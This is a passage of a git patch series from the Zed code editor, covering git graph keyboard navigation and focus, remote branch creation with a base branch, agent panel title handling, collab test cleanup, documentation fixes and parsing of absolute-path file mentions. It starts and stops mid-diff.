Some(VecOrJsonString::String(string)) => 
serde_json::from_str::>(&string) - .map(Some) - .map_err(|error| { - D::Error::custom(format!("failed to parse stringified edits array: {error}")) - }), + match ValueOrJsonString::::deserialize(deserializer)? { + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), } } @@ -4180,6 +4174,72 @@ mod tests { ); } + #[test] + fn test_input_deserializes_double_encoded_fields() { + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, StreamingEditFileMode::Edit)); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text, "hello\nworld"); + assert_eq!(edits[0].new_text, "HELLO\nWORLD"); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"" + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": null + })) + .expect("input should deserialize"); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "\"edit\"", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })) + .expect("input should deserialize"); + + assert!(matches!(input.mode, Some(StreamingEditFileMode::Edit))); + let edits = input.edits.expect("edits should deserialize"); + assert_eq!(edits.len(), 1); + assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); + 
assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt" + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + + let input = serde_json::from_value::(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": null, + "edits": null + })) + .expect("input should deserialize"); + assert!(input.mode.is_none()); + assert!(input.edits.is_none()); + } + async fn setup_test_with_fs( cx: &mut TestAppContext, fs: Arc, From c86ad4f3559b5b6fae7f736a2b91dcfec16d3c49 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sat, 2 May 2026 22:50:51 +0200 Subject: [PATCH 133/231] git_graph: Fix search bar Vim key handling (#55510) #53609 introduced a regression where Git Graph keybindings could take precedence over the search bar. As a result, typing characters like `j` or `k` in the search field could move the table selection instead of updating the search query. This PR fixes that regression by scoping Vim table navigation bindings away from the search bar. It also adds dedicated `tab` and `shift-tab` handling for Git Graph focus traversal, with the search bar and graph table participating as separate tab groups. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- assets/keymaps/default-linux.json | 14 ++++++ assets/keymaps/default-macos.json | 14 ++++++ assets/keymaps/default-windows.json | 14 ++++++ assets/keymaps/vim.json | 14 ++++++ crates/editor/src/editor.rs | 4 ++ crates/git_graph/src/git_graph.rs | 68 +++++++++++++++++++++++++++-- 6 files changed, 125 insertions(+), 3 deletions(-) diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index ba7f514766ee55..66f527ef0244d6 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -1536,4 +1536,18 @@ "ctrl-shift-backspace": "worktree_picker::DeleteWorktree", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 11750aa74148e7..8e115985db8d92 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -1627,4 +1627,18 @@ "escape": "notebook::EnterCommandMode", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/default-windows.json 
b/assets/keymaps/default-windows.json index 2526a9412c6775..9ac7ed46cfd737 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -1553,4 +1553,18 @@ "escape": "notebook::EnterCommandMode", }, }, + { + "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, ] diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 188ea2e483a65d..6e52ac3ce63b9d 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1035,6 +1035,20 @@ }, { "context": "GitGraph", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraphSearchBar > Editor", + "bindings": { + "tab": "git_graph::FocusNextTabStop", + "shift-tab": "git_graph::FocusPreviousTabStop", + }, + }, + { + "context": "GitGraph && !GitGraphSearchBar", "bindings": { "j": "vim::MenuSelectNext", "k": "vim::MenuSelectPrevious", diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index e523ae27032284..c625a3b97af1a3 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -3536,6 +3536,10 @@ impl Editor { cx.notify(); } + pub fn show_cursor(&mut self, cx: &mut Context) { + self.blink_manager.update(cx, BlinkManager::show_cursor); + } + pub fn cursor_shape(&self) -> CursorShape { self.cursor_shape } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e92204c5f12fd0..1f7d4b886619cf 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -282,6 +282,10 @@ actions!( OpenCommitView, /// Focuses the search field. FocusSearch, + /// Focuses the next git graph tab stop. + FocusNextTabStop, + /// Focuses the previous git graph tab stop. 
+ FocusPreviousTabStop, ] ); @@ -1110,7 +1114,11 @@ impl GitGraph { editor }); - let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); + let table_interaction_state = cx.new(|cx| { + let mut state = TableInteractionState::new(cx); + state.focus_handle = state.focus_handle.tab_index(1).tab_stop(true); + state + }); let column_widths = if matches!(log_source, LogSource::Path(_)) { cx.new(|_cx| { @@ -1602,6 +1610,39 @@ impl GitGraph { self.search(query, cx); } + fn activate_search_editor_if_focused(&self, window: &mut Window, cx: &mut Context) { + self.search_state.editor.update(cx, |editor, cx| { + if editor.is_focused(window) { + editor.select_all(&Default::default(), window, cx); + editor.show_cursor(cx); + } + }); + } + + fn focus_next_tab_stop( + &mut self, + _: &FocusNextTabStop, + window: &mut Window, + cx: &mut Context, + ) { + window.focus_next(cx); + self.activate_search_editor_if_focused(window, cx); + cx.stop_propagation(); + cx.notify(); + } + + fn focus_previous_tab_stop( + &mut self, + _: &FocusPreviousTabStop, + window: &mut Window, + cx: &mut Context, + ) { + window.focus_prev(cx); + self.activate_search_editor_if_focused(window, cx); + cx.stop_propagation(); + cx.notify(); + } + fn select_entry( &mut self, idx: usize, @@ -1783,7 +1824,12 @@ impl GitGraph { fn render_search_bar(&self, cx: &mut Context) -> impl IntoElement { let color = cx.theme().colors(); - let query_focus_handle = self.search_state.editor.focus_handle(cx); + let query_focus_handle = self + .search_state + .editor + .focus_handle(cx) + .tab_index(1) + .tab_stop(true); let search_options = { let mut options = SearchOptions::NONE; options.set( @@ -1794,6 +1840,10 @@ impl GitGraph { }; h_flex() + .key_context("GitGraphSearchBar") + .tab_index(1) + .tab_group() + .tab_stop(false) .w_full() .p_1p5() .gap_1p5() @@ -1806,6 +1856,7 @@ impl GitGraph { .min_w_0() .px_1p5() .gap_1() + .track_focus(&query_focus_handle) .border_1() .border_color(color.border_variant) 
.rounded_md() @@ -2811,6 +2862,8 @@ impl Render for GitGraph { let hovered_entry_idx = self.hovered_entry_idx; let weak_self = cx.weak_entity(); let focus_handle = self.focus_handle.clone(); + let table_focus_handle = + self.table_interaction_state.read(cx).focus_handle.clone(); let graph_canvas = div() .id("graph-canvas") @@ -2840,7 +2893,9 @@ impl Render for GitGraph { .map_row(move |(index, row), window, cx| { let is_selected = selected_entry_idx == Some(index); let is_hovered = hovered_entry_idx == Some(index); - let is_focused = focus_handle.is_focused(window); + let table_focus_handle = table_focus_handle.clone(); + let is_focused = focus_handle.is_focused(window) + || table_focus_handle.is_focused(window); let weak = weak_self.clone(); let weak_for_hover = weak.clone(); @@ -2873,6 +2928,7 @@ impl Render for GitGraph { }) .on_click(move |event, window, cx| { let click_count = event.click_count(); + table_focus_handle.focus(window, cx); weak.update(cx, |this, cx| { this.select_entry( index, @@ -2914,6 +2970,9 @@ impl Render for GitGraph { }) .child( div() + .tab_index(2) + .tab_group() + .tab_stop(false) .w(DefiniteLength::Fraction(table_fraction)) .h_full() .min_w_0() @@ -2958,12 +3017,15 @@ impl Render for GitGraph { this.search_state .editor .update(cx, |editor, cx| editor.focus_handle(cx).focus(window, cx)); + this.activate_search_editor_if_focused(window, cx); })) .on_action(cx.listener(Self::select_first)) .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) .on_action(cx.listener(Self::select_last)) .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::focus_next_tab_stop)) + .on_action(cx.listener(Self::focus_previous_tab_stop)) .on_action(cx.listener(|this, _: &SelectNextMatch, _window, cx| { this.select_next_match(cx); })) From 78e5ceff35b08bdd26af6b338c81d779f9f87a26 Mon Sep 17 00:00:00 2001 From: boaz-h <63008204+boaz-h@users.noreply.github.com> Date: Sun, 3 May 2026 01:26:50 +0300 Subject: [PATCH 
134/231] Fix creating branch with base in remote (#55387) To support branch create with base branch, added extra optional field in GitCreateBranch proto. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #43985 Release Notes: - git: Fixed remote branch creation based on default branch --- crates/project/src/git_store.rs | 4 +++- crates/proto/proto/git.proto | 1 + 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 8956345c68ef82..b30b943d032737 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -2753,10 +2753,11 @@ impl GitStore { let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; let branch_name = envelope.payload.branch_name; + let base_branch = envelope.payload.base_branch; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.create_branch(branch_name, None) + repository_handle.create_branch(branch_name, base_branch) }) .await??; @@ -7033,6 +7034,7 @@ impl Repository { project_id: project_id.0, repository_id: id.to_proto(), branch_name, + base_branch, }) .await?; diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index 9d583a166c95f7..cea288ea2a0b7a 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -180,6 +180,7 @@ message GitCreateBranch { reserved 2; uint64 repository_id = 3; string branch_name = 4; + optional string base_branch = 5; } message GitChangeBranch { From 6cf062f6e1cb147d579ba1c00a406c36b74323aa Mon Sep 
17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sun, 3 May 2026 00:30:18 +0200 Subject: [PATCH 135/231] agent_panel: Keep current title name when generating new title (#55512) When generating a title we replace the title text of the agent panel with a hard coded "New Agent Thread" title, even when a title already exists. This PR uses the pre existing title name as a place holder during title generating instead of the hard coded value. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A or Added/Fixed/Improved ... --- crates/agent_ui/src/agent_panel.rs | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index e52e82120a2e49..8285da9e113e92 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -29,7 +29,6 @@ use zed_actions::{ assistant::{FocusAgent, OpenRulesLibrary, Toggle, ToggleFocus}, }; -use crate::DEFAULT_THREAD_TITLE; use crate::ExpandMessageEditor; use crate::ManageProfiles; use crate::agent_connection_store::AgentConnectionStore; @@ -2691,7 +2690,7 @@ impl AgentPanel { .map(|r| r.read(cx).title_editor.clone()) { if is_generating_title { - Label::new(DEFAULT_THREAD_TITLE) + Label::new(server_view_ref.title(cx)) .color(Color::Muted) .truncate() .with_animation( From fb0140336a73b6f163f836ad5fc3284c34869fef Mon Sep 17 00:00:00 2001 From: raptor Date: Sun, 3 May 2026 16:30:09 +0200 Subject: [PATCH 136/231] docs: Remove invalid `preferred_line_length` option value from `soft_wrap` (#55538) This PR updates the documentation to remove the no 
longer valid `preferred_line_length` option value from `soft_wrap`. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- docs/src/reference/all-settings.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index f175d51a398d63..eb4ccd1259ea4e 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -3932,8 +3932,7 @@ Positive integer values 1. `none` to avoid wrapping generally, unless the line is too long 2. `prefer_line` (deprecated, same as `none`) 3. `editor_width` to wrap lines that overflow the editor width -4. `preferred_line_length` to wrap lines that overflow `preferred_line_length` config value -5. `bounded` to wrap lines at the minimum of `editor_width` and `preferred_line_length` +4. `bounded` to wrap lines at the minimum of `editor_width` and `preferred_line_length` ## Show Wrap Guides From cd213546e0a1619a09c530aca62a03fc1dcd1377 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 2026 17:33:50 +0200 Subject: [PATCH 137/231] collab: Simplify contributor setup in `test_channel_requires_zed_cla` (#55558) This PR updates the `test_channel_requires_zed_cla` test to simplify the setup for denoting that a user has signed the CLA. Since the user already exists in the database, we can just create the corresponding record without needing to worry about upserting. 
Release Notes: - N/A --- crates/collab/src/db/queries/contributors.rs | 24 ++----------------- .../tests/integration/channel_guest_tests.rs | 18 +++++++------- 2 files changed, 10 insertions(+), 32 deletions(-) diff --git a/crates/collab/src/db/queries/contributors.rs b/crates/collab/src/db/queries/contributors.rs index d5cc03e69d5bde..2c1cc710061c4e 100644 --- a/crates/collab/src/db/queries/contributors.rs +++ b/crates/collab/src/db/queries/contributors.rs @@ -3,30 +3,10 @@ use super::*; impl Database { /// Records that a given user has signed the CLA. #[cfg(feature = "test-support")] - pub async fn add_contributor( - &self, - github_login: &str, - github_user_id: i32, - github_email: Option<&str>, - github_name: Option<&str>, - github_user_created_at: DateTimeUtc, - initial_channel_id: Option, - ) -> Result<()> { + pub async fn add_contributor(&self, user_id: UserId) -> Result<()> { self.transaction(|tx| async move { - let user = self - .update_or_create_user_by_github_account_tx( - github_login, - github_user_id, - github_email, - github_name, - github_user_created_at.naive_utc(), - initial_channel_id, - &tx, - ) - .await?; - contributor::Entity::insert(contributor::ActiveModel { - user_id: ActiveValue::Set(user.id), + user_id: ActiveValue::Set(user_id), signed_at: ActiveValue::NotSet, }) .on_conflict( diff --git a/crates/collab/tests/integration/channel_guest_tests.rs b/crates/collab/tests/integration/channel_guest_tests.rs index 85d69914a832c6..95b1eeca5fc905 100644 --- a/crates/collab/tests/integration/channel_guest_tests.rs +++ b/crates/collab/tests/integration/channel_guest_tests.rs @@ -1,6 +1,5 @@ use crate::TestServer; use call::ActiveCall; -use chrono::Utc; use collab::db::ChannelId; use editor::Editor; use gpui::{BackgroundExecutor, TestAppContext}; @@ -183,14 +182,6 @@ async fn test_channel_guest_promotion(cx_a: &mut TestAppContext, cx_b: &mut Test #[gpui::test] async fn test_channel_requires_zed_cla(cx_a: &mut TestAppContext, cx_b: &mut 
TestAppContext) { let mut server = TestServer::start(cx_a.executor()).await; - - server - .app_state - .db - .update_or_create_user_by_github_account("user_b", 100, None, None, Utc::now(), None) - .await - .unwrap(); - let client_a = server.create_client(cx_a, "user_a").await; let client_b = server.create_client(cx_b, "user_b").await; let active_call_a = cx_a.read(ActiveCall::global); @@ -288,10 +279,17 @@ async fn test_channel_requires_zed_cla(cx_a: &mut TestAppContext, cx_b: &mut Tes }); // User B signs the zed CLA. + let user_b = server + .app_state + .db + .get_user_by_github_login("user_b") + .await + .unwrap() + .expect("user_b not found"); server .app_state .db - .add_contributor("user_b", 100, None, None, Utc::now(), None) + .add_contributor(user_b.id) .await .unwrap(); From 49b8841f50dd69306fe1b72611a6e7f66ff5ec22 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 2026 17:37:45 +0200 Subject: [PATCH 138/231] collab: Remove tests for `update_or_create_user_by_github_account` (#55559) This PR removes the tests for the `update_or_create_user_by_github_account` method, as it is not called outside of tests/seeding in local development. 
Release Notes: - N/A --- .../tests/integration/db_tests/db_tests.rs | 64 ------------------- 1 file changed, 64 deletions(-) diff --git a/crates/collab/tests/integration/db_tests/db_tests.rs b/crates/collab/tests/integration/db_tests/db_tests.rs index 710f95dbf7d82e..a8724a90ec4ab0 100644 --- a/crates/collab/tests/integration/db_tests/db_tests.rs +++ b/crates/collab/tests/integration/db_tests/db_tests.rs @@ -1,7 +1,6 @@ use crate::test_both_dbs; use super::*; -use chrono::Utc; use collab::db::RoomId; use collab::db::*; use pretty_assertions::assert_eq; @@ -73,69 +72,6 @@ async fn test_get_users(db: &Arc) { ); } -test_both_dbs!( - test_update_or_create_user_by_github_account, - test_update_or_create_user_by_github_account_postgres, - test_update_or_create_user_by_github_account_sqlite -); - -async fn test_update_or_create_user_by_github_account(db: &Arc) { - db.create_user( - "user1@example.com", - None, - false, - NewUserParams { - github_login: "login1".into(), - github_user_id: 101, - }, - ) - .await - .unwrap(); - let user_id2 = db - .create_user( - "user2@example.com", - None, - false, - NewUserParams { - github_login: "login2".into(), - github_user_id: 102, - }, - ) - .await - .unwrap() - .user_id; - - let user = db - .update_or_create_user_by_github_account( - "the-new-login2", - 102, - None, - None, - Utc::now(), - None, - ) - .await - .unwrap(); - assert_eq!(user.id, user_id2); - assert_eq!(&user.github_login, "the-new-login2"); - assert_eq!(user.github_user_id, 102); - - let user = db - .update_or_create_user_by_github_account( - "login3", - 103, - Some("user3@example.com"), - None, - Utc::now(), - None, - ) - .await - .unwrap(); - assert_eq!(&user.github_login, "login3"); - assert_eq!(user.github_user_id, 103); - assert_eq!(user.email_address, Some("user3@example.com".into())); -} - test_both_dbs!( test_add_contacts, test_add_contacts_postgres, From 077b36bca17216b9433b76083949bb599f7dc9a9 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 
2026 18:45:40 +0200 Subject: [PATCH 139/231] collab: Remove stray `dev_servers.rs` module (#55566) This PR removes a stray, empty `dev_servers.rs` module from the `collab` crate. Release Notes: - N/A --- crates/collab/src/db/queries/dev_servers.rs | 1 - 1 file changed, 1 deletion(-) delete mode 100644 crates/collab/src/db/queries/dev_servers.rs diff --git a/crates/collab/src/db/queries/dev_servers.rs b/crates/collab/src/db/queries/dev_servers.rs deleted file mode 100644 index 8b137891791fe9..00000000000000 --- a/crates/collab/src/db/queries/dev_servers.rs +++ /dev/null @@ -1 +0,0 @@ - From e39c55af813ef720642973739adac0f17525e7b1 Mon Sep 17 00:00:00 2001 From: aprogramq <70436334+aprogramq@users.noreply.github.com> Date: Sun, 3 May 2026 20:19:47 +0300 Subject: [PATCH 140/231] git_graph: Improve navigation in Vim mode (#55506) Added Ctrl-D/Ctrl-U for Vim navigation in the Git graph https://github.com/user-attachments/assets/8d3ad67c-829a-4a80-9508-80d48cf0decf Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55485 Release Notes: - Improved Vim navigation in the git graph with Ctrl-U and Ctrl-D half-page scrolling. 
--------- Co-authored-by: Anthony Eid --- assets/keymaps/vim.json | 2 + crates/git_graph/src/git_graph.rs | 91 +++++++++++++++++++++++++++++-- 2 files changed, 87 insertions(+), 6 deletions(-) diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 6e52ac3ce63b9d..88e8e35204042c 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1052,6 +1052,8 @@ "bindings": { "j": "vim::MenuSelectNext", "k": "vim::MenuSelectPrevious", + "ctrl-d": "git_graph::ScrollDown", + "ctrl-u": "git_graph::ScrollUp", "shift-g": "menu::SelectLast", "g g": "menu::SelectFirst" } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 1f7d4b886619cf..5a7e7a30294236 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -286,6 +286,10 @@ actions!( FocusNextTabStop, /// Focuses the previous git graph tab stop. FocusPreviousTabStop, + /// Selects a commit half a page above the current selection. + ScrollUp, + /// Selects a commit half a page below the current selection. 
+ ScrollDown, ] ); @@ -1025,6 +1029,20 @@ impl GitGraph { (raw * scale).round() / scale } + fn visible_row_count(&self, window: &Window, cx: &App) -> usize { + let row_height = Self::row_height(window, cx); + let viewport_height = self + .table_interaction_state + .read(cx) + .scroll_handle + .0 + .borrow() + .last_item_size + .map_or(window.viewport_size().height, |size| size.item.height); + + ((viewport_height / row_height).ceil() as usize).min(self.graph_data.commits.len()) + } + fn graph_canvas_content_width(&self) -> Pixels { (LANE_WIDTH * self.graph_data.max_lanes.max(6) as f32) + LEFT_PADDING * 2.0 } @@ -1534,6 +1552,28 @@ impl GitGraph { ); } + fn scroll_up(&mut self, _: &ScrollUp, window: &mut Window, cx: &mut Context) { + let step = (self.visible_row_count(window, cx) / 2).max(1); + let target_idx = self.selected_entry_idx.unwrap_or(0).saturating_sub(step); + + self.select_entry(target_idx, ScrollStrategy::Nearest, cx); + } + + fn scroll_down(&mut self, _: &ScrollDown, window: &mut Window, cx: &mut Context) { + let Some(last_entry_idx) = self.graph_data.commits.len().checked_sub(1) else { + return; + }; + + let step = (self.visible_row_count(window, cx) / 2).max(1); + let target_idx = self + .selected_entry_idx + .unwrap_or(0) + .saturating_add(step) + .min(last_entry_idx); + + self.select_entry(target_idx, ScrollStrategy::Nearest, cx); + } + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { self.open_selected_commit_view(window, cx); } @@ -1649,7 +1689,12 @@ impl GitGraph { scroll_strategy: ScrollStrategy, cx: &mut Context, ) { - if self.selected_entry_idx == Some(idx) { + if self.selected_entry_idx == Some(idx) || idx >= self.graph_data.commits.len() { + debug_assert!( + idx < self.graph_data.commits.len(), + "attempted to select out of bounds index: {idx}, commits.len: {}", + self.graph_data.commits.len() + ); return; } @@ -2345,6 +2390,7 @@ impl GitGraph { fn render_graph_canvas(&self, window: &Window, cx: &mut Context) 
-> impl IntoElement { let row_height = Self::row_height(window, cx); + let visible_row_count = self.visible_row_count(window, cx); let table_state = self.table_interaction_state.read(cx); let viewport_height = table_state .scroll_handle @@ -2368,8 +2414,7 @@ impl GitGraph { } else { graph_viewport_width }; - let last_visible_row = - first_visible_row + (viewport_height / row_height).ceil() as usize + 1; + let last_visible_row = first_visible_row + visible_row_count + 1; let viewport_range = first_visible_row.min(loaded_commit_count.saturating_sub(1)) ..(last_visible_row).min(loaded_commit_count); @@ -3023,6 +3068,8 @@ impl Render for GitGraph { .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) .on_action(cx.listener(Self::select_last)) + .on_action(cx.listener(Self::scroll_up)) + .on_action(cx.listener(Self::scroll_down)) .on_action(cx.listener(Self::confirm)) .on_action(cx.listener(Self::focus_next_tab_stop)) .on_action(cx.listener(Self::focus_previous_tab_stop)) @@ -5173,8 +5220,8 @@ mod tests { workspace::MultiWorkspace::test_new(project.clone(), window, cx) }); - let workspace_weak = - multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + let workspace = multi_workspace.read_with(&*cx, |multi, _| multi.workspace().clone()); + let workspace_weak = workspace.downgrade(); let git_graph = cx.new_window_entity(|window, cx| { GitGraph::new( @@ -5188,6 +5235,11 @@ mod tests { }); cx.run_until_parked(); + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(git_graph.clone()), None, true, window, cx); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { graph.focus_handle(cx).focus(window, cx); }); @@ -5196,10 +5248,15 @@ mod tests { cx.draw( point(px(0.), px(0.)), gpui::size(px(1200.), px(800.)), - |_, _| git_graph.clone().into_any_element(), + |_, _| multi_workspace.clone().into_any_element(), ); cx.run_until_parked(); + 
git_graph.update_in(cx, |graph, window, cx| { + graph.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { assert_eq!(graph.graph_data.commits.len(), 10); }); @@ -5215,6 +5272,22 @@ mod tests { assert_eq!(graph.selected_entry_idx, Some(0)); }); + let scroll_step = git_graph.update_in(cx, |graph, window, cx| { + (graph.visible_row_count(window, cx) / 2).max(1) + }); + + cx.dispatch_action(ScrollDown); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(scroll_step)); + }); + + cx.dispatch_action(ScrollUp); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + git_graph.update_in(cx, |graph, window, cx| { graph.select_next(&menu::SelectNext, window, cx); }); @@ -5239,6 +5312,12 @@ mod tests { assert_eq!(graph.selected_entry_idx, Some(9)); }); + cx.dispatch_action(ScrollDown); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(9)); + }); + git_graph.update_in(cx, |graph, window, cx| { graph.select_next(&menu::SelectNext, window, cx); }); From a1e2258227e380e5f212072dfdb2d2b5083da113 Mon Sep 17 00:00:00 2001 From: Revantark Date: Mon, 4 May 2026 00:41:53 +0530 Subject: [PATCH 141/231] acp_thread: Support absolute file mentions with row fragments (#53229) Sometimes the contents in the agent's thread are direct file links. Codex ACP almost every time uses absolute file paths instead of file://path/to/file. This is resulting in an error described in the #49978 . 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #49978 Release Notes: - Fixed absolute path mentions in `acp_thread` so direct file references (including `:line` and `#Lline` formats) now open correctly instead of resolving to invalid/empty files. --------- Co-authored-by: Eric Holk --- crates/acp_thread/src/mention.rs | 190 ++++++++++++++++++++++++++++++- 1 file changed, 189 insertions(+), 1 deletion(-) diff --git a/crates/acp_thread/src/mention.rs b/crates/acp_thread/src/mention.rs index 403b71736c9470..4d52c202c633e4 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -12,7 +12,10 @@ use std::{ use ui::{App, IconName, SharedString}; use url::Url; use urlencoding::decode; -use util::{ResultExt, paths::PathStyle}; +use util::{ + ResultExt, + paths::{PathStyle, PathWithPosition, is_absolute}, +}; #[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize, Hash)] pub enum MentionUri { @@ -65,6 +68,11 @@ pub enum MentionUri { impl MentionUri { pub fn parse(input: &str, path_style: PathStyle) -> Result { + let input = input + .strip_prefix('`') + .and_then(|input| input.strip_suffix('`')) + .unwrap_or(input); + fn parse_line_range(fragment: &str) -> Result> { let range = fragment.strip_prefix("L").unwrap_or(fragment); @@ -92,6 +100,39 @@ impl MentionUri { Ok(start_line..=end_line) } + let parse_absolute_path = |input: &str| -> Result { + let (path_input, fragment) = input + .split_once('#') + .map_or((input, None), |(path, fragment)| (path, Some(fragment))); + + if let Some(fragment) = fragment.and_then(|fragment| 